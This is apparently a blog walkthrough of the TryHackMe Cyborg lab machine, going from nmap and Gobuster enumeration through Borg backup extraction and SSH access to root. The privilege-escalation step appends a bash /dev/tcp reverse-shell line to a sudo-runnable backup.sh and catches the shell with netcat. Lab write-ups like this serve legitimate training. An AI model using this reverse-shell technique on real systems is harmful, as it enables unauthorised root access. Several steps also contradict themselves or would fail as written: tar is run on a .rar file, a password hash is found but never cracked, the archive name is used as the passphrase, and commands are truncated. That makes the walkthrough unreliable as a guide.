Unlocking the Digital Fortress: A Step-by-Step Journey Through the…
In the vast and ever-evolving landscape of cybersecurity, challenges like the TryHackMe Cyborg offer a thrilling opportunity to test and hone our skills. This isn’t just about breaking into a system; it’s about understanding the intricacies of web enumeration, SSH, and privilege escalation. So, let’s embark on this digital adventure, step by step, and unravel the secrets of the Cyborg challenge.
Understanding the Machine
Before we dive into the action, it’s essential to understand the machine we’re dealing with. The Cyborg challenge is hosted on a Linux system and is rated as easy, making it an excellent starting point for those new to cybersecurity. The primary skills required are web enumeration, SSH, and privilege escalation. These skills are fundamental in the cybersecurity world and are often the first steps in many penetration testing engagements.
Step 1: Scanning the Target
Our journey begins with a scan of the target machine. We’ll use nmap, a powerful network scanning tool, to identify open ports and services running on the target.
nmap -p- -sV
The scan reveals two open ports: Port 22, which is running SSH (Secure Shell), and Port 80, which is running HTTP (Hypertext Transfer Protocol). Port 80 is the standard port for web servers, so it’s a good place to start our investigation.
Exploring Port 80
When we visit the website hosted on Port 80, we’re greeted with a default Apache page. This is a common sight in cybersecurity challenges, as it indicates that the server is running Apache but hasn’t been customized yet. This is our cue to start web enumeration.
Step 2: Enumerating the Web
Web enumeration is the process of discovering hidden directories and files on a web server. We’ll use Gobuster, a popular directory brute-forcing tool, to uncover these hidden gems.
gobuster dir -u http://
The scan reveals two interesting directories: /admin and /etc. These directories are often used to store sensitive information, so they’re worth investigating further.
Investigating the /admin Directory
When we navigate to the /admin directory, we find a chat log. This log contains valuable information about the system’s configuration and potential vulnerabilities. It mentions a Squid proxy, a backup tool called Borg, and a password for the Borg backup.
Investigating the /etc Directory
The /etc directory contains system configuration files. In this case, it contains a hash. This hash is likely a password hash, and it’s our next target for cracking.
Step 3: Unarchiving the Archive
The chat log mentions a backup called “music_archive”. We’ll use this information to find the backup file. We’ll use the tar command to extract the contents of the archive.rar file.
tar -xvf archive.rar
The extraction reveals a directory structure with several files. The README and config files mention Borg, a backup tool known for its efficiency and security. Borg is a deduplication backup tool that is popular for its efficiency, security, and ease of use.
Extracting the Borg Archive
To extract the Borg archive, we’ll use the borg extract command. However, we’ll need a passphrase to do this. The chat log mentions the passphrase “music_archive”, so we’ll use that.
borg extract `pwd`::music_archive
The extraction reveals a Download directory. This directory contains an SSH key. We’ll use this key to log into the server as the user alex.
Step 4: Privilege Escalation
Now that we’re logged in as alex, we’ll check our sudo privileges. We’ll use the sudo -l command to do this.
sudo -l
The command reveals that we can execute backup.sh as root. This is a common privilege escalation vector, as it allows us to run a script with root privileges.
Exploiting the backup.sh Script
To exploit the backup.sh script, we’ll need to understand how it works. We’ll use the cat command to view the contents of the script.
cat backup.sh
The script contains a command that backs up the /var/www/html directory to the /var/backups directory. We’ll modify this command to give us a shell as root.
echo ‘bash -i >& /dev/tcp/
We’ll then set up a netcat listener on our attacker machine to catch the shell.
nc -lvnp
Finally, we’ll execute the backup.sh script as root.
sudo /home/alex/backup.sh
And just like that, we’ve gained root access to the system.
Conclusion
The TryHackMe Cyborg challenge is a fantastic way to test and hone our cybersecurity skills. It’s a step-by-step journey that takes us from web enumeration to privilege escalation. Each step is a learning opportunity, and each challenge is a test of our knowledge and skills.
Remember, cybersecurity is a journey, not a destination. Each challenge is an opportunity to learn and grow. So, keep practicing, keep learning, and most importantly, keep having fun.
FAQ
What is the Cyborg challenge?
The Cyborg challenge is a cybersecurity challenge hosted on the TryHackMe platform. It’s designed to test and hone skills in web enumeration, SSH, and privilege escalation.
What skills are required for the Cyborg challenge?
The primary skills required for the Cyborg challenge are web enumeration, SSH, and privilege escalation. These skills are fundamental in the cybersecurity world and are often the first steps in many penetration testing engagements.
What tools are used in the Cyborg challenge?
The tools used in the Cyborg challenge include nmap, Gobuster, Borg, and netcat. These tools are popular in the cybersecurity world and are often used in penetration testing engagements.
How do I get started with the Cyborg challenge?
To get started with the Cyborg challenge, you’ll need to create a TryHackMe account and join the Cyborg challenge. Once you’ve joined the challenge, you can start following the steps outlined in this walkthrough.
What is the difficulty level of the Cyborg challenge?
The Cyborg challenge is rated as easy, making it an excellent starting point for those new to cybersecurity. However, even experienced cybersecurity professionals can learn and grow from this challenge.
What is the purpose of the Cyborg challenge?
The purpose of the Cyborg challenge is to test and hone skills in web enumeration, SSH, and privilege escalation. It’s also a learning opportunity for those new to cybersecurity, as it provides a step-by-step journey through the penetration testing process.
Leave a Comment